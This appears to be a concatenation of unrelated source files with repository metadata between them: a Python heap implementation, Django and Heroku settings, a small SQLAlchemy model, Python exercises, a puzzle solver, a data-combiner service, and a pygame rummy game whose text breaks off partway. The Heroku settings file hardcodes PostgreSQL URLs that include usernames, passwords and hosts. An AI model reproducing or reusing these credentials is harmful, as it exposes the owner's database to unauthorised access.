(min_payload, root) = _pop_(sf, root)
assert root.size == L-1
assert H-1 <= root.height <= H
return (min_payload, root)
def _pop_(sf, root, /):
(deepest_unit, root) = _pop__deepest_unit(sf, root)
#bug:min_payload = _pop_then_push(sf, root, removed_unit.payload)
(min_payload, root) = _push_then_pop(sf, root, deepest_unit.payload)
return (min_payload, root)
def _pop__deepest_unit(sf, root, /):
if root.is_empty: raise HeapError__Empty
ls = [root]
while not ls[-1].is_unit:
ls.append(ls[-1].large_child)
if not ls: raise logic-err
removed_unit = ls.pop()
assert removed_unit.height == 1
if ls:
#bug:_replace_child(ls[-1], removed_unit, _empty_node)
removed_fork = ls.pop()
assert removed_fork.lhs_child.is_unit
assert removed_fork.rhs_child.is_unit
another_unit = removed_fork.another_child_of(removed_unit)
root = _replace_child_and_fresh_nodes(sf, ls, removed_fork, another_unit)
deepest_unit = removed_unit
else:
assert root.is_unit
deepest_unit = root
root = _empty_node
return (deepest_unit, root)
def _push_then_pop(sf, root, payload, /):
if root.is_empty:
return payload, root
assert root.height
if not sf._lt__payload(root.min_payload, payload):
return payload, root
return _pop_then_push(sf, root, payload)
def _pop_then_push(sf, root, payload, /):
assert root.height > 0
min_payload = root.min_payload
ls = [root]
while not ls[-1].is_unit:
ls.append(ls[-1].the_min_payload_child)
min_unit = ls.pop()
assert min_unit.height == 1
assert min_unit.payload is min_payload
new_unit = _MHNodeUnit(payload)
root = _replace_child_and_fresh_nodes(sf, ls, min_unit, new_unit)
return min_payload, root
def _mk(sf, payloads, /):
'-> root'
ls = [*map(_MHNodeUnit, payloads)]
L = len(ls)
while len(ls) > 1:
#INVARIANT: assert all(0 <= ls[-1].height - node.height <= 1 for node in ls[:-1])
# let H := ls[0].height
# [ls[?].height == H]
# [H <= ls[-1].height <= H+1]
assert 0 <= ls[-1].height - ls[-2].height <= 1
#bug:xs = [_MHNode(sf._lt__node, ls[i], ls[i+1]) for i in range(0, len(ls), 2)]
xs = [_MHNode(sf._lt__node, ls[i], ls[i+1]) for i in range(0, len(ls)-1, 2)]
# [xs[?].height == H+1]
# [H+1 <= xs[-1].height <= H+2]
# [[xs[-1].height == H+2] <-> [[ls[-1].height == H+1][len(ls)%2==0]]]
if len(ls)&1:
# !! [[xs[-1].height == H+2] <-> [[ls[-1].height == H+1][len(ls)%2==0]]]
# !! [len(ls)%2=!=0]
# [xs[-1].height =!= H+2]
# [xs[-1].height == H+1]
#bug:xs.append(ls[-1])
if ls[-1].height < xs[-1].height:
# !! [H <= ls[-1].height <= H+1]
# !! [xs[-1].height == H+1]
# !! [ls[-1].height < xs[-1].height]
# [ls[-1].height == H]
xs[-1] = _MHNode(sf._lt__node, xs[-1], ls[-1])
# [xs[-1].height == H+2]
# [xs[?].height == H+1]
else:
# !! [H <= ls[-1].height <= H+1]
# !! [not [ls[-1].height < xs[-1].height]]
# !! [xs[-1].height == H+1]
# [ls[-1].height == H+1]
xs.append(ls[-1])
# [xs[-1].height == H+1]
# [xs[?].height == H+1]
# [H+1 <= xs[-1].height <= H+2]
# [xs[?].height == H+1]
# [H+1 <= xs[-1].height <= H+2]
# [xs[?].height == H+1]
ls = xs
# [H+1 <= ls[-1].height <= H+2]
# [ls[?].height == H+1]
if not ls:
root = _empty_node
else:
[root] = ls
assert root.size == L
return root
def _pushs(sf, root, payloads, /):
'-> root'
return _eat(sf, root, _mk(sf, payloads))
def _push(sf, root, payload, /):
'-> root'
new_unit = _MHNodeUnit(payload)
return _eat(sf, root, new_unit)
def _replace_child_and_fresh_nodes(sf, ancestors, old_child, new_child, /):
for i in reversed(range(len(ancestors))):
old_parent = ancestors[i]
new_parent = _replace_child(sf, old_parent, old_child, new_child)
ancestors[i] = new_parent
(old_child, new_child) = (old_parent, new_parent)
root = new_child
return root
def _replace_child(sf, parent, old_child, new_child, /):
assert not new_child.is_empty
lhs_child, rhs_child = parent.children
if parent.lhs_child is old_child:
lhs_child = new_child
elif parent.rhs_child is old_child:
rhs_child = new_child
else:
raise logic-err
return _MHNode(sf._lt__node, lhs_child, rhs_child)
def _eat(sf, lhs_root, rhs_root, /):
'-> root #O(logM)算法'
L = lhs_root.size + rhs_root.size
H = max(lhs_root.height, rhs_root.height)
########
root = _eat_(sf, lhs_root, rhs_root)
assert root.size == L
assert H <= root.height <= H+1
return root
def _eat_(sf, lhs_root, rhs_root, /):
(rhs_root, lhs_root) = sorted([rhs_root, lhs_root], key=_get_height4node)
if rhs_root.is_empty:
#[rhs_root is lhs_root is _empty_node] is OK
return lhs_root
if 0:
if rhs_root is lhs_root:
#[rhs_root is lhs_root is not _empty_node] is bug
raise HeapError__EatSelf
assert 1 <= rhs_root.height <= lhs_root.height
ls = [lhs_root]
while ls[-1].height > rhs_root.height:
ls.append(ls[-1].small_child)
removed_subtree = ls.pop()
assert removed_subtree.height <= rhs_root.height
assert not ls or 1 <= ls[-1].height - removed_subtree.height <= 2
assert not ls or 1 <= ls[-1].height - rhs_root.height <= 2
assert 0 <= rhs_root.height - removed_subtree.height <= 1
if removed_subtree.is_empty:
assert removed_subtree.height == 0 < 1 <= rhs_root.height <= lhs_root.height
assert ls
assert 1 == rhs_root.height < ls[-1].height == 2
new_node = rhs_root
else:
new_node = _MHNode(sf._lt__node, removed_subtree, rhs_root)
assert not ls or 0 <= ls[-1].height - new_node.height <= 1
# small_child ==>> [0 <= ls[-1].another_child<removed_subtree>.height - removed_subtree.height <= 1]
# [rhs_root.height >= removed_subtree.height] ==>> [new_node.height == rhs_root.height+1 > removed_subtree.height]
# [rhs_root.height < ls[-1].height] ==>> [new_node.height <= ls[-1].height]
# [removed_subtree.height < ls[-1].another_child<removed_subtree>.height <= new_node.height <= ls[-1].height]
# 『==』==>>_fresh_nodes
root = _replace_child_and_fresh_nodes(sf, ls, removed_subtree, new_node)
return root
def _unorder_iter_payloads5root(root, /):
for node in _unorder_iter_nodes5root(root):
if node.is_unit:
yield node.payload
def _unorder_iter_nodes5root(root, /):
ls = [root]
while ls:
node = ls.pop()
if not node.is_empty:
yield node
ls.append(node.rhs_child)
ls.append(node.lhs_child)
def _node_as_tree(root, /):
'tree=(()|(payload, tree, tree))'
xs = []
ls = [root]
while ls:
node = ls.pop()
xs.append(node)
if not node.is_empty:
ls.append(node.rhs_child)
ls.append(node.lhs_child)
#xs = [root, root.lhs_child, ..., root.rhs_child, ...]
while xs:
node = xs.pop()
if node.is_empty:
tree = null_tuple
else:
children = []
children.append(ls.pop())
children.append(ls.pop())
assert len(children)==2
tree = (node.min_payload, *children)
ls.append(tree)
[tree] = ls
return tree
if __name__ == "__main__":
import doctest
doctest.testmod()
| [
"wuming_zher@zoho.com.cn"
] | wuming_zher@zoho.com.cn |
9636c810b69765d56b8a06b0152aac218b6558fb | 140351f0a75aaaef1949c80ef5ceaa2da22a726f | /pysite/extra_heroku_end_settings.py | f7d143e8000b48ef9182618c4ef18baf8cfd1fc5 | [] | no_license | ashish2/djApps | 69005a2b48d859772fff989ed432d274d113a823 | 4f7f28d130d998a902593602a10fa6723b7305e7 | refs/heads/master | 2016-08-12T03:18:28.009964 | 2016-02-24T12:19:37 | 2016-02-24T12:19:37 | 47,876,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,153 | py | import os
from settings import DATABASES
# Settings at the End
### Settings for Heroku
import dj_database_url
#DATABASES['default'] = dj_database_url.config(default=os.environ.get('DATABASE_URL'))
heroku_pg_url = 'postgres://ivvmabgfrysfgo:hJJ_2qRdime4SRRH9AeiY-GqYz@ec2-50-17-207-54.compute-1.amazonaws.com:5432/df4n1vasgl12gv'
heroku_pg_url = "postgres://ezvnjwuahvqkbn:0EcFmNpePt3ARLBAOjiyDH9rwx@ec2-54-204-35-207.compute-1.amazonaws.com:5432/d6lgoemjjf1emo"
# New For this app
#HEROKU_POSTGRESQL_PUCE_URL
#postgresql-reticulated-9660
#/
#DATABASES = {'default': dj_database_url.config(default=heroku_pg_url)}
DATABASES['default'] = dj_database_url.config(default=heroku_pg_url)
# honor the 'x_forwarded_proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all hosts headers
ALLOW_HOST = ['*']
# Static asset configuration
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
#STATIC_ROOT = 'staticfiles'
#STATIC_ROOT = 'static_root'
#STATIC_URL = '/static/'
current_dir = os.path.dirname( __file__ )
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
current_dir,
)
| [
"vickyojha2@yahoo.com"
] | vickyojha2@yahoo.com |
b56f2969e543d5827dc089cd6dcd23d2f694d788 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/verbs/_chomps.py | b371d13ce61f330b9635ad464a74c0b37a02a7dd | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 231 | py |
from xai.brain.wordbase.verbs._chomp import _CHOMP
#calss header
class _CHOMPS(_CHOMP, ):
def __init__(self,):
_CHOMP.__init__(self)
self.name = "CHOMPS"
self.specie = 'verbs'
self.basic = "chomp"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
de81742251cf7ecbf57753936bfec1cccd7b5c38 | 1aba70d53d9f2ace50821ead9958e18d23cbfb0c | /app/mysite/models/charts_model.py | 0161f4d89e6dfc72308be90e27ad3ae7e8a05bb9 | [] | no_license | Danny19880402/mysite | 6e567593e47486100f623e99b8dadaa8d0419456 | 5c82810f75360d5ad40bf299a8be12ce7eff2112 | refs/heads/master | 2023-01-06T14:04:29.359774 | 2019-07-06T12:40:34 | 2019-07-06T12:40:34 | 195,534,587 | 1 | 0 | null | 2023-01-04T03:49:04 | 2019-07-06T11:59:49 | Vue | UTF-8 | Python | false | false | 455 | py | from mysite import db
class Chartsmodel(db.Model):
__tablename__ = 'chart_details'
__table_args__ = {'mysql_engine': 'InnoDB'} # 支持事务操作和外键
# 主键
id = db.Column(db.Integer, primary_key=True)
# 价格
price = db.Column(db.Float, doc='价格', nullable=False)
# 数量
volume = db.Column(db.Float, doc='数量', nullable=False)
dealTime = db.Column(db.DateTime, doc='成交时间', nullable=False)
| [
"duxuede1988@163.com"
] | duxuede1988@163.com |
a024d712549319ead7d5ae7cb1d75ef40cfb79c6 | 72b71a584bc699da188772ae7240d6044d872e86 | /jusik/mypage/jusik/apps.py | 538a595277b415357545c460448a3727ba76648e | [] | no_license | heyoni/DjangoProject | 460e3cc2a7126e5c78bd9bf45791d25c09fc2b31 | a9dffd2d3dd6665984f4729e3eff30167002e6ac | refs/heads/master | 2023-08-29T04:07:42.222331 | 2021-10-13T14:34:18 | 2021-10-13T14:34:18 | 327,337,049 | 0 | 1 | null | 2021-10-06T14:10:49 | 2021-01-06T14:31:25 | Python | UTF-8 | Python | false | false | 85 | py | from django.apps import AppConfig
class JusikConfig(AppConfig):
name = 'jusik'
| [
"hhheyoni@gmail.com"
] | hhheyoni@gmail.com |
5ccb4dbf3827407afe7f4a7dbc3bc34ea0c28322 | 36da0543e6f3895dd0879e34f63642238400532c | /authorities/urls.py | 118e149e58d03b40750cb2ab3c6c5b5aee31b8fe | [] | no_license | chengfangang/django_auth | 3ecb93cabc50de007c736cfb0961298f19078cc3 | a7846627c34ee50548f17250dc62acefcac1311a | refs/heads/master | 2021-08-08T01:29:38.570387 | 2017-11-07T21:16:24 | 2017-11-07T21:16:24 | 110,074,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 770 | py | """django_auth URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from .views import appsettings
urlpatterns = [
url(r'/appsettings/$', appsettings),
]
| [
"chengfangang@etongdai.com"
] | chengfangang@etongdai.com |
5ce0af09173a46398d227ccbc5d3c1eb9b6bb19c | 2a807b5763465b1566bc3f24146d6fd81d8a5bd3 | /python_para_android_ios_win_linux_mac/03_tomada_de_decisao/exercicio12.py | 6c0d125bb2404157d5eab59e4b9e6c58b12c77f8 | [] | no_license | rafaelrsanches/cursos_python | 8fbebf81a84242d762923ff8257f17ec3b2c6ec9 | f52a6df977babd9df01d560f7a3c112d0a3e2b32 | refs/heads/master | 2020-03-25T22:13:10.608625 | 2018-12-14T23:44:12 | 2018-12-14T23:44:12 | 144,211,018 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 272 | py | # Faça um algoritmo que peça um valor numérico. Em seguida, verifique se o número é inteiro ou decimal.
num = float(input("Digite um valor numérico: "))
if num % 1 == 0:
print("O valor é um número inteiro!")
else:
print("O valor é um número decimal!")
| [
"rafael.rsanches96@gmail.com"
] | rafael.rsanches96@gmail.com |
90ceac38ceff608f92ae59f32d3a70d07fa83eeb | df30f97d316e899b07b223bc86cfe53345627f06 | /problems/baek/13460_구슬탈출2.py | 865933d4fd8f95d6c035b5044bd340af67f6b81f | [] | no_license | GH-Lim/AlgorithmPractice | c6a3aa99fa639aa23d685ae14c1754e0605eaa98 | e7b8de2075348fb9fcc34c1d7f211fdea3a4deb0 | refs/heads/master | 2021-06-18T17:21:10.923380 | 2021-04-18T03:43:26 | 2021-04-18T03:43:26 | 199,591,747 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,441 | py | from collections import deque
N, M = map(int, input().split())
board = [list(input()) for _ in range(N)]
R = (0, 0)
B = (0, 0)
O = (0, 0)
for i in range(1, N - 1):
for j in range(1, M - 1):
if board[i][j] == 'R':
R = (i, j)
elif board[i][j] == 'B':
B = (i, j)
elif board[i][j] == 'O':
O = (i, j)
dy = [-1, 1, 0, 0]
dx = [0, 0, -1, 1]
visited = {}
def bfs(R, B):
q = deque([(R, B)])
for cnt in range(1, 11):
for _ in range(len(q)):
r, b = q.popleft()
visited[(r, b)] = 1
for d in range(4):
beads = move(r, b, d)
if beads and beads[0] == O:
return cnt
if beads and beads not in visited:
q.append(beads)
return -1
def move(r, b, d):
ry, rx = r
by, bx = b
r_cnt = 0
b_cnt = 0
while board[ry + dy[d]][rx + dx[d]] != '#':
r_cnt += 1
ry += dy[d]
rx += dx[d]
if (ry, rx) == O:
break
while board[by + dy[d]][bx + dx[d]] != '#':
b_cnt += 1
by += dy[d]
bx += dx[d]
if (by, bx) == O:
return False
if (ry, rx) == (by, bx):
if r_cnt > b_cnt:
ry -= dy[d]
rx -= dx[d]
else:
by -= dy[d]
bx -= dx[d]
r = ry, rx
b = by, bx
return r, b
print(bfs(R, B))
| [
"gunhyuck11@naver.com"
] | gunhyuck11@naver.com |
c4387e96c598bb7541d03f278120c1dd682176cb | 99d65074c1614eb2966465b145d57e1d80914139 | /Condition.py | f6233a88e58138358d9b9be1a51c64b2f7a43336 | [] | no_license | prtptl/Data-Science | 80db9aafd55a693cab48f1b68906b1936af2b6c8 | 33ff92e19f8d78234e11969147bf9abcf38b006f | refs/heads/master | 2020-04-20T02:35:14.600700 | 2019-01-31T20:14:48 | 2019-01-31T20:14:48 | 168,575,180 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | #!/usr/bin/env python
# coding: utf-8
# In[3]:
import math
#area=input("Enter the area")
# In[4]:
#type(area)
# In[15]:
area=float(input("Enter the area"))
# In[16]:
type(area)
# In[18]:
if area>0:
radius=math.sqrt(area/math.pi)
print("the radius is", radius)
else:
print("Enter positive number")
# In[21]:
if radius>5:
diameter=2*radius
print("diameter is", diameter)
elif radius>4:
print("you are in elif")
else:
print("Error")
# ### for loop
# In[34]:
for i in range(1,4):
print("Hello")
# In[35]:
range(i)
# ### while loop
# In[37]:
counter=5
while counter>1:
print(counter)
counter=counter-1
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
b3ff2dc9e5cecb1e83a1e6e6cd93011b6a4465a7 | d09ea6c980275f741d607a218fb3d23a9e7184d5 | /happy_tree/solver.py | 9e8298102198fab963c6dddbfa5c19795d6d415c | [] | no_license | galli-leo/tctf2020 | 1aadb5484407ad0e3190d7c01e96b4dc9b40418a | 257ac6cdff3f44068fc9973fc189b6f9c6c365b8 | refs/heads/master | 2022-11-07T21:49:42.770348 | 2020-07-03T15:40:18 | 2020-07-03T15:40:18 | 276,872,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,551 | py | from numpy import uint32
def check(flag):
loc_7 = uint32(flag)
vals = {}
for i in range(0x186a0):
tmp1 = uint32(loc_7 << 0xd) # 0x56582884
tmp2 = uint32(tmp1 ^ loc_7) # 0x56586f00
tmp3 = uint32(tmp2 >> 0x11) # 0x5657e20c
tmp4 = uint32(tmp3 ^ tmp2) # 0x56586cf8
tmp5 = uint32(tmp4 << 5) # 0x56583590
tmp6 = uint32(tmp5 ^ tmp4) # 0x56586c58
loc_7 = tmp6
# if loc_7 in vals:
# print("repeated at: ", i, tmp1, tmp2, tmp3, tmp4, tmp5)
# print(vals[loc_7])
# idx = i
# vals[tmp1] = (idx, "tmp1")
# vals[tmp2] = (idx, "tmp2")
# vals[tmp3] = (idx, "tmp3")
# vals[tmp4] = (idx, "tmp4")
# vals[tmp5] = (idx, "tmp5")
# vals[loc_7] = (idx, "loc_7")
return loc_7
def check2(flag):
loc_7 = flag
vals = {}
for i in range(0x186a0):
tmp1 = loc_7 << 0xd # 0x56582884
tmp2 = (tmp1 ^ loc_7) # 0x56586f00
tmp3 = (tmp2 >> 0x11) # 0x5657e20c
tmp4 = (tmp3 ^ tmp2) # 0x56586cf8
tmp5 = (tmp4 << 5) # 0x56583590
tmp6 = (tmp5 ^ tmp4) # 0x56586c58
loc_7 = tmp6
# if loc_7 in vals:
# print("repeated at: ", i, tmp1, tmp2, tmp3, tmp4, tmp5)
# print(vals[loc_7])
# idx = i
# vals[tmp1] = (idx, "tmp1")
# vals[tmp2] = (idx, "tmp2")
# vals[tmp3] = (idx, "tmp3")
# vals[tmp4] = (idx, "tmp4")
# vals[tmp5] = (idx, "tmp5")
# vals[loc_7] = (idx, "loc_7")
return loc_7 | [
"leonardo.galli@bluewin.ch"
] | leonardo.galli@bluewin.ch |
37ff219abc5a713483b7f6bfffc7ffcae2e5104d | bbc3ff5dc623774d8cd4e8d8154da353b7523552 | /Lambda_double.py | 11c687a55b041ebac4ec0aece9d8286dd0a4b7b0 | [] | no_license | millanmilu/Learn-Python | e78b562e212fb1854322e726f5663c7f74d3b7f7 | ab5f55a86686d1c7bb5ccbe5201f4186ad8fdbc8 | refs/heads/master | 2020-04-13T20:01:01.892395 | 2019-01-05T14:18:34 | 2019-01-05T14:18:34 | 163,418,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | def my_fun(n):
return lambda a:a*n
mydouble = my_fun(2)
print(mydouble(11)) | [
"noreply@github.com"
] | noreply@github.com |
19225bced8ac87070dfd4bf7df8d4fe653fba6af | 0d59fa410624676908e1470fb9105cb8a280525c | /Algorithms/itertools/itertools_cycle.py | 779bb2629e1349e4c5d5978c5e075686ef194ad3 | [
"MIT"
] | permissive | Nobodylesszb/python_module | 122d41e776036dfc61a187e383dda821c35e25c4 | 37d2cdcf89a3ff02a9e560696a059cec9272bd1f | refs/heads/master | 2020-05-31T07:48:57.695494 | 2019-07-29T11:32:17 | 2019-07-29T11:32:17 | 190,173,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | #该cycle()函数返回一个迭代器,它重复无限期给出的参数的内容。
# 由于它必须记住输入迭代器的全部内容,
# 如果迭代器很长,它可能会消耗相当多的内存
from itertools import *
for i in zip(range(7), cycle(['a', 'b', 'c'])):
print(i)
"""
output:
(0, 'a')
(1, 'b')
(2, 'c')
(3, 'a')
(4, 'b')
(5, 'c')
(6, 'a')
""" | [
"nobodylesszb@163.com"
] | nobodylesszb@163.com |
62cee17ddeb7c10ac5f70ed1eb57139892d7c7ca | a16236f9fbe72be1a8566d2067e4e66921a8a90e | /fbpmp/data_processing/attribution_id_combiner/attribution_id_spine_combiner_cpp.py | b6614231fe3d00730513a482b8b7b874faec7f16 | [
"MIT"
] | permissive | peking2/fbpcs-1 | dc9e57afc5bab28f0d43ed537d4147e008f51030 | 234bc748f24046a13fbd14ee7794df5d70ab348b | refs/heads/main | 2023-07-29T22:03:05.983480 | 2021-08-18T23:56:25 | 2021-08-18T23:57:19 | 397,813,444 | 0 | 0 | MIT | 2021-08-19T04:15:22 | 2021-08-19T04:15:22 | null | UTF-8 | Python | false | false | 5,169 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import asyncio
import logging
from typing import Optional
from fbpcp.entity.container_instance import ContainerInstanceStatus
from fbpcp.service.onedocker import OneDockerService
from fbpmp.onedocker_binary_names import OneDockerBinaryNames
from fbpmp.pid.service.pid_service.pid_stage import PIDStage
# 10800 s = 3 hrs
DEFAULT_CONTAINER_TIMEOUT_IN_SEC = 10800
class CppAttributionIdSpineCombinerService:
def _get_combine_cmd_args_for_container(
self,
spine_path: str,
data_path: str,
output_path: str,
run_name: str,
tmp_directory: str,
padding_size: int,
sort_strategy: str,
) -> str:
# TODO: Probably put exe in an env variable?
# Try to align with existing paths
cmd_args = " ".join(
[
f"--spine_path={spine_path}",
f"--data_path={data_path}",
f"--output_path={output_path}",
f"--run_name={run_name}",
f"--tmp_directory={tmp_directory}",
f"--padding_size={padding_size}",
f"--sort_strategy={sort_strategy}",
]
)
return cmd_args
def combine_on_container(
self,
spine_path: str,
data_path: str,
output_path: str,
num_shards: int,
run_name: str,
onedocker_svc: OneDockerService,
tmp_directory: str,
padding_size: int,
binary_version: str,
sort_strategy: str = "sort",
container_timeout: Optional[int] = None,
) -> None:
asyncio.run(
self.combine_on_container_async(
spine_path,
data_path,
output_path,
num_shards,
run_name,
onedocker_svc,
tmp_directory,
padding_size,
binary_version,
sort_strategy,
container_timeout,
)
)
async def combine_on_container_async(
self,
spine_path: str,
data_path: str,
output_path: str,
num_shards: int,
run_name: str,
onedocker_svc: OneDockerService,
tmp_directory: str,
padding_size: int,
binary_version: str,
sort_strategy: str = "sort",
container_timeout: Optional[int] = None,
) -> None:
logger = logging.getLogger(__name__)
timeout = container_timeout or DEFAULT_CONTAINER_TIMEOUT_IN_SEC
# TODO: Combiner could be made async so we don't have to spawn our
# own ThreadPoolExecutor here and instead use async primitives
cmd_args_list = []
for shard in range(num_shards):
# TODO: There's a weird dependency between these two services
# AttributionIdSpineCombiner should operate independently of PIDStage
next_spine_path = PIDStage.get_sharded_filepath(spine_path, shard)
next_data_path = PIDStage.get_sharded_filepath(data_path, shard)
next_output_path = PIDStage.get_sharded_filepath(output_path, shard)
cmd_args = self._get_combine_cmd_args_for_container(
next_spine_path,
next_data_path,
next_output_path,
run_name,
tmp_directory,
padding_size,
sort_strategy,
)
cmd_args_list.append(cmd_args)
containers = await onedocker_svc.start_containers_async(
package_name=OneDockerBinaryNames.ATTRIBUTION_ID_SPINE_COMBINER.value,
version=binary_version,
cmd_args_list=cmd_args_list,
timeout=timeout,
)
# Busy wait until all containers are finished
any_failed = False
for shard, container in enumerate(containers):
# Busy wait until the container is finished
status = ContainerInstanceStatus.UNKNOWN
logger.info(f"Task[{shard}] started, waiting for completion")
while status not in [
ContainerInstanceStatus.FAILED,
ContainerInstanceStatus.COMPLETED,
]:
container = onedocker_svc.get_containers([container.instance_id])[0]
status = container.status
# Sleep 5 seconds between calls to avoid an unintentional DDoS
logger.debug(f"Latest status: {status}")
await asyncio.sleep(5)
logger.info(
f"container_id({container.instance_id}) finished with status: {status}"
)
if status is not ContainerInstanceStatus.COMPLETED:
logger.error(f"Container {container.instance_id} failed!")
any_failed = True
if any_failed:
raise RuntimeError(
"One or more containers failed. See the logs above to find the exact container_id"
)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
c4b3fd6c50a9c062239571170f6518b778e577d4 | fb67e1b98f4170077da0e29617e34317d7d68d53 | /main.py | 4fa1d56aae636f2b2f3181cb77d4674c0efca12c | [] | no_license | HadiGhazali/rock-paper-scissors | 14151f518d0349bb07b4d22d88a2d423165c9553 | 5505a91f27fb448536364aab277f91a4193cf5a2 | refs/heads/main | 2023-02-01T10:04:22.179265 | 2020-12-20T16:12:59 | 2020-12-20T16:12:59 | 318,649,381 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,080 | py | from random import choice
from constants import PLAYER_OPTIONS, PLAY_BUTTON, STATUS
from core import check_win, modify_scores, check_total
scores = {'user': 0, 'system': 0, 'total_user': 0, 'total_system': 0}
play = True
while play:
user_input = input('Enter your choice pleas')
system_input = choice(list(PLAYER_OPTIONS.keys()))
if user_input in PLAYER_OPTIONS.keys():
result = check_win(user_input, system_input)
current_scores = modify_scores(result, scores)
print('your choice:{}, system choice:{},result:{},\t {}-{}'.format(PLAYER_OPTIONS[user_input],
PLAYER_OPTIONS[system_input], STATUS[result],
current_scores['user'],
current_scores['system']))
check_total(current_scores)
elif user_input in PLAY_BUTTON.keys():
play = False
print('Bye!')
else:
print('Invalid input')
| [
"hadivardanjani1378@gmail.com"
] | hadivardanjani1378@gmail.com |
bc91b19087d5a7bd6e0122a487b1d95cecab4f5e | 354fe66c120c5902ffc7ddf954ec19cfd0432a99 | /Test Data/base_scripts/example.py | d9d34783c900e9e2d15f969309b8d3a920bde449 | [] | no_license | bartoszirzyk/MachineLearningExperiments | e58f389d7db21cd1be64192c8171a278e1c9cfc0 | 3026e4a0597eb1c835b253e12c35b0096f3a3ee8 | refs/heads/master | 2021-01-21T17:57:10.940984 | 2016-03-12T21:49:32 | 2016-03-12T21:49:32 | 47,024,354 | 0 | 0 | null | 2015-11-28T13:24:00 | 2015-11-28T13:24:00 | null | UTF-8 | Python | false | false | 387 | py | from data import samples
print("There are {} samples.".format(len(samples)))
print("Whois data of 2nd sample (ip: {}):".format(samples[1]["ip"]))
print(samples[1]["whois"])
print("RevDNS data of first ten samples:")
print("\n".join([ repr(s["hostnames"]) for s in samples[:10] ]))
print("Open ports of first 10 samples:")
print("\n".join([ repr(s["ports"]) for s in samples[:10] ]))
| [
"kacper.b.zuk@gmail.com"
] | kacper.b.zuk@gmail.com |
55b924629ae7cc5e7818fa72e34b3189bb0c1917 | 2955e99046b6888ba3203697f1de354ed78f2912 | /src/game_rummy.py | 36862124164a68ee424af146c9fbe4b2f6077caa | [] | no_license | kishansinha181/Rummy-pygame | 9e2f179946f9b5853136102dc1b0e442cf2d7758 | 6db5e71a2512c6a470a2df099a2709ec2d607626 | refs/heads/master | 2022-12-08T06:30:19.304211 | 2020-08-31T04:40:43 | 2020-08-31T04:40:43 | 291,606,089 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,085 | py | import pygame
import os
import random
import sys
import time
from pygame.locals import *
import itertools
pygame.init()
screen = pygame.display.set_mode((1500,750))
play =True
pygame.display.set_caption("RUMMY")
xc=50
y_u=100
y_d=500
x_change=0
y_change=0
z=0
y=0
suits = ["c" , "d" , "h" , "s"]
cards_num = []
for i in range(1,14):
if i<10:
cards_num.append("0"+str(i))
else:
cards_num.append(str(i))
deck=[]
for j in cards_num:
for k in suits:
t=j+k
deck.append(t)
deck.append(t)
random.shuffle(deck)
sample_p=[]
sample_c=[]
deck_dis=[]
for i in range(13):
sample_p.append(deck[i])
deck.pop(i)
for i in range(13):
sample_c.append(deck[i])
deck.pop(i)
m=deck.pop()
deck_dis.append(m)
c3_1_p=[]
c3_2_p=[]
c3_3_p=[]
c4_p=[]
c3_1_c=[]
c3_2_c=[]
c3_3_c=[]
c4_c=[]
v_3=[]
v_4=[]
c3_sets_c=[]
c3_sets_d=[]
c3_sets_h=[]
c3_sets_s=[]
c3_sets_id1=[]
c3_sets_id2=[]
c3_sets_id3=[]
c3_sets_id4=[]
for i in range(1,12):
c3_sets_c.append([str(i),str(i+1),str(i+2)])
c3_sets_c.append([str(1),str(12),str(13)])
for j in c3_sets_c:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_c:
for j in range(3):
i[j]=i[j]+suits[0]
for i in range(1,12):
c3_sets_d.append([str(i),str(i+1),str(i+2)])
c3_sets_d.append([str(1),str(12),str(13)])
for j in c3_sets_d:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_d:
for j in range(3):
i[j]=i[j]+suits[1]
for i in range(1,12):
c3_sets_h.append([str(i),str(i+1),str(i+2)])
c3_sets_h.append([str(1),str(12),str(13)])
for j in c3_sets_h:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_h:
for j in range(3):
i[j]=i[j]+suits[2]
for i in range(1,12):
c3_sets_s.append([str(i),str(i+1),str(i+2)])
c3_sets_s.append([str(1),str(12),str(13)])
for j in c3_sets_s:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_s:
for j in range(3):
i[j]=i[j]+suits[3]
for i in range(1,14):
c3_sets_id1.append([str(i),str(i),str(i)])
for j in c3_sets_id1:
for i in range(3):
if int(j[i])<10:
j[i]= '0'+j[i]
for i in c3_sets_id1:
i[0] = i[0]+ suits[0]
i[1] = i[1]+ suits[1]
